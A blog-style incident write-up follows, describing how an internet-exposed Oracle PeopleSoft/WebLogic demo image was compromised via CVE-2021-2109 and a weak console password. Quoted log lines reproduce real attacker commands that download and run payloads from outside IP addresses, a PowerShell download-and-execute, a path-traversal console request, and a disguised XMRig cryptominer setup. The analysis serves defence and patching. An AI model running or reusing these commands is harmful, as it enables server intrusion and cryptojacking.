Introduction

People working on Oracle stack must have worked on Oracle Weblogic, application server for hosting enterprise applications.

Oracle Weblogic is a leading player in the industry and most of the products from Oracle like PeopleSoft, OBIEE use it for hosting applications. I am working with Oracle products for past many years now and have not seen a security incident in all these years but all that trust and sense of security was shattered by a phone call I received from my former colleague.

My colleague is working on Oracle people Soft, (which uses weblogic to host the web-application). Over call he described a strange issue where after logging into the application the page just freezes and then does not respond to any clicks. Initially, it looked like that its just a simple case of threads getting stuck over custom code and I should be able to figure this out. So i asked him to send me all the application logs and I will take a look.

Oracle Peoplesoft Environment

The environment consisted of a demo image provided by Oracle having following components :

All the components were installed on a pre-configured Virtual Box image and the url was exposed over internet.

Log Analysis

Thinking this to be a simple performance issue, i started checking Tuxedo application server logs but could not find any thing.

So , decided to take a a look at web-server logs shown in the screenshot below:

I started with PIA_Weblogic.log but could not find any issues.

Next I moved to peoplesoft.log and the first line in the log was :

####<Jul 29, 2021 11:20:29,223 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bf9> <1627600829223> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <cd /tmp;rm -rf x86_64;wget http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;curl -O http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;> 

and the second line

####<Jul 29, 2021 11:20:29,223 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bf9> <1627600829223> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <[/bin/sh, -c, cd /tmp;rm -rf x86_64;wget http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;curl -O http://167.88.12.77/.Samael/x86_64;chmod +x x86_64;./x86_64 x86_64;rm -rf x86_64;]> 

and the third line:

####<Jul 29, 2021 11:20:29,259 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '3' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bf9> <1627600829259> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <[Error: illegal escape sequence: A]
[Near : {... )).useDelimiter("\\\A").next();
    weblogic.servl ....}]

Some one is trying to use the weblogic domain to get access to the shell, then downloaded files from 167.88.12.77 and then give execute permission to these files.

Next few lines confirmed that the environment was attacked, in the below line we can see that attacker was trying to download python and execute setup.py file using powershell.

####<Jul 29, 2021 11:20:29,447 PM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '10' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000bfb> <1627600829447> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <@powershell -NoProfile -ExecutionPolicy unrestricted -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/manthey/pyexe/releases/download/v18/py27.exe', 'python.exe'); (New-Object System.Net.WebClient).DownloadFile('http://198.199.81.5/setup.py', 'setup.py');" & .\python.exe setup.py> 

Logs from July 29th are filled with attacker trying to execute powershell and the next day logs were showing :

####<Jul 30, 2021 3:48:50,850 AM UTC> <Notice> <Stdout> <localhost> <PIA> <[ACTIVE] ExecuteThread: '10' for queue: 'weblogic.kernel.Default (self-tuning)'> <<anonymous>> <> <d3a993c1-affd-4160-beac-49e042c345c7-00000c21> <1627616930850> <[severity-value: 32] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000000> <weblogic.servlet.internal.ServletRequestImpl@408df612[
POST /console/framework/skins/wlsconsole/images/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fconsole.portal HTTP/1.1
Content-Length: 1241
Accept-Encoding: gzip,deflate
Cmd: cd /tmp||cd $(find / -writable -readable -executable | head -n 1);wget http://23.94.186.34/setup -O setup||curl http://23.94.186.34/setup -O setup;chmod 777 setup;./setup;wget http://23.94.186.34/setup.py -O setup.py||curl http://23.94.186.34/setup.py -O setup.py;chmod 777 setup.py;python2 setup.py||python2.7 setup.py||python setup.py||./setup.py;echo 'ARGS="-o gulf.moneroocean.stream:18192 -u 45iHeQwQaunWXryL9YZ2egJxKvWBtWQUE4PKitu1VwYNUqkhHt6nyCTQb2dbvDRqDPXveNq94DG9uTndKcWLYNoG2uonhgH -p Network --cpu-no-yield --asm=auto --cpu-memory-pool=-1 -B"; curl http://23.94.186.34/xmrig1 -O||wget http://23.94.186.34/xmrig1 -O xmrig1;mkdir .1;mv -f xmrig1 .1/sshd;chmod 777 /.1/sshd;curl http://23.94.186.34/xmrig -O||wget http://23.94.186.34/xmrig -O xmrig;mkdir $PWD/.2;mv -f xmrig $PWD/.2/sshd;chmod 777 $PWD/.2/sshd;echo './.1/sshd $ARGS;./.2/sshd $ARGS'>.bootstrap.sh;chmod 655 bootstrap.sh;./.bootstrap.sh&
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: wget
Connection: close
Content-Type: application/x-www-form-urlencoded

]> 

From the above code looks like somehow attacker got access to the console and then he is executing commands. At this point I called my former colleague and asked him to zip the contents of /tmp folder from the VM and send it over.

below is the screenshot of the contents of the /tmp folder

One look at the contents and I knew the system was compromised but the question was how the attacker got access to console?

To confirm I uploaded setup.py on Virus Total which confirmed that the system is infected

CVE-2021-2109

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. The RCE vulnerability exists in the console component of the WebLogic Server. The vulnerability can be exploited by sending a crafted HTTP request and can lead to complete control of the host.

Conclusion

In case you are still behind on Critical Patches released by Oracle, please go ahead and install them asap. Also, makes sure to treat the weblogic console with same respect that it deserves. This sort of attack takes just a simple well crafted HTTP request and a easy to break password (Passw0rd in this case) to fully compromise the system. On the affected server, attacker tried a brute force attack against root password but was not successful. For further analysis of the malwares, please continue watching this space for more details.

References:

  1. https://nvd.nist.gov/vuln/detail/CVE-2021-2109

Leave a Reply

Your email address will not be published. Required fields are marked *